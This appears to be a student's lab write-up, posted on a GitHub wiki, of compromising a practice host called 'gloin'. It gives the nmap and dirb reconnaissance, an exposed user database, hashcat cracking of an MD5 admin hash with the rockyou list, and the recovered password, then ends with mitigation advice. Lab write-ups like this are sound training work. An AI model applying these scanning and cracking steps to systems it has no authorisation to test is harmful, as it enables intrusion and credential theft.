Exploiting Gloin - tmansfield42/Tech-Journal GitHub Wiki

● Target IP Address

nslookup [what you're looking up] [DNS server]

nslookup -vc gloin.shire.org 10.0.5.21

IP is 10.0.5.31

● Open Ports

nmap -sV -O -A 10.0.5.31

22, 443, 3389

● Discovered Vulnerability

dirb https://10.0.5.31

10.0.5.31/entrance_exam/db is an open database containing user information

● How you achieved a foothold

downloaded the database, looked in the 1st table labeled admin_list and copied the hashed password labeled password

● How you achieved root/Administrative level compromise

echo "4214db3884e9cd913b49b5b44e49ae96" > hash.txt

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Password is Moria2Featon6

● User Flag

● Root Flag

● How might the vulnerabilities be mitigated by the systems administrator and developer?

Definitely could be mitigated by not having a database containing user info available to the open web. It was relatively easy to find (just used the dirb command) and also the user and password in the mysql database was shared across computer accounts.

What gave you trouble with this Target? What did you need assistance with? Provide a link to your journal page.

A bunch of things gave me trouble, I tried doing SQL injection but couldn't get to the Admin account nor could I get into the actual computer itself. I eventually rediscovered the database file available and that led me down the right path.